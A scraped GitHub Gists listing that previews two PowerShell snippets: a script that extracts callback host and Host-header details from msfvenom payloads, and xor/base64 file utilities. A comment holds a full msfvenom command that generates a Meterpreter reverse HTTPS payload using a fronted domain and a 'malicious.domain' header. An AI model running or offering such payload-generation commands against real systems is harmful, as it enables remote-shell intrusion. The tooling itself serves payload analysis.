vp777
/ MSFVenom-Info.ps1
Last active
December 22, 2018 10:21
Extract info from at least the psh-cmd reverse http(s) payloads generated by msfvenom.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| ${msfvenom} -p windows/meterpreter/reverse_https LHOST=amazon.co.uk LPORT=443 HttpHostHeader=malicious.domain -f psh-cmd -o rev.cmd | |
| MSFVenom-Info -Name rev.cmd | |
| Output: | |
| amazon.co.uk:443 | |
| Host: malicious.domain | |
| #> | |
| Function Find-Pattern { |
vp777
/ Misc-FileOperations.ps1
Created
December 18, 2018 15:39
Functions to support base64, xor and splitting/combining of files with progress bar.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #example: "file.to.be.(en|de)crypted" | enxor -Secret ΣΕΚΡΕΤ | |
| Function enxor { | |
| Param ( | |
| [Parameter(Mandatory=$True,ValueFromPipeline=$True, ParameterSetName="p1", position=0)] | |
| [System.IO.FileSystemInfo]$File, | |
| [Parameter(Mandatory=$True,ValueFromPipeline=$True, ParameterSetName="p2", position=0)] | |
| [string]$FilePath, | |
| [int]$Batch = 102400, |
NewerOlder